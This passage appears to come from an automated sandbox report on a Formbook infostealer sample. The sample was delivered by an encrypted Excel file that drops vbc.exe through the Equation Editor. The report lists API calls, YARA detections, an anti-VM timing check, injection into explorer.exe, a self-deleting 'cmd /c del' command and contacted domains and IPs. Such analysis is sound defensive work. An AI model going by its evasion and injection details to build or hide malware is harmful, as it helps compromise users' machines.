          Source: C:\Users\Public\vbc.exe Code function: 5_2_0096FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_020600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_020607AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0205FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02060048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02060060 NtQuerySection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02060078 NtResumeThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020610D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0206010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02061148 NtOpenThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_020601D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02061930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02060C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0205FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_02061D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000981D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00098280 NtReadFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_00098300 NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000983B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0009827B NtCreateFile,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000982FD NtClose,
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_000983AB NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
Source: L2.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0206DF5C appears 115 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 020DF970 appears 81 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 020B3F92 appears 108 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 020B373B appears 238 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 0206E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0097DF5C appears 105 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0097E2A8 appears 37 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009EF970 appears 78 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009C3F92 appears 111 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009C373B appears 210 times
Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/21@8/4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$L2.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD558.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\control.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: L2.xlsx Virustotal: Detection: 30%
Source: L2.xlsx ReversingLabs: Detection: 26%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: L2.xlsx Static file information: File size 1308600 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: control.pdb source: vbc.exe, 00000005.00000002.2187506391.0000000000880000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, control.exe
Source: L2.xlsx Initial sample: OLE indicators vbamacros = False
Source: L2.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\Public\vbc.exe Code function: 4_2_73002F60 push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C9AD push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040D291 push ebp; iretd
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B3C5 push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040C394 pushad ; ret
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B47C push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B412 push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B41B push eax; ret
Source: C:\Users\Public\vbc.exe Code function: 5_2_00414E45 push ebp; iretd
Source: C:\Users\Public\vbc.exe Code function: 5_2_004106D4 push cs; iretd
Source: C:\Users\Public\vbc.exe Code function: 5_2_00414F4F push ss; ret
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0206DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0008D291 push ebp; iretd
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0008C394 pushad ; ret
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0009B3C5 push eax; ret
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0009B41B push eax; ret
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0009B412 push eax; ret
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0009B47C push eax; ret
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0009C4F5 push cs; iretd
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000906D4 push cs; iretd
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0009C9AD push eax; ret
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00094E45 push ebp; iretd
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_00094F4F push ss; ret
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsr4627.tmp\System.dll
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: L2.xlsx | Stream path 'EncryptedPackage' entropy: 7.99983620552 (max. 8.0)

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe | RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088C0 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2652 | Thread sleep time: -300000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 964 | Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 172 | Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exe | Last function: Thread delayed
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040263E FindFirstFileA,
          Source: explorer.exe, 00000006.00000000.2158460248.0000000004234000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.2151792778.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000006.00000000.2158486728.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2158460248.0000000004234000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2148950526.0000000000584000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000006.00000000.2152068739.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe | Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088C0 rdtsc
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B30 LdrLoadDll,
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\Public\vbc.exe | Code function: 5_2_009826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 7_2_020726F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.meganfantastic.com
          Source: C:\Windows\explorer.exe | Domain query: www.adultvideolife.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.sciencebasedmasks.com
          Source: C:\Windows\explorer.exe | Network Connect: 45.195.169.197 80
          Source: C:\Windows\explorer.exe | Domain query: www.alberthospice.com
          Source: C:\Windows\explorer.exe | Network Connect: 154.84.76.49 80
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\control.exe | Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
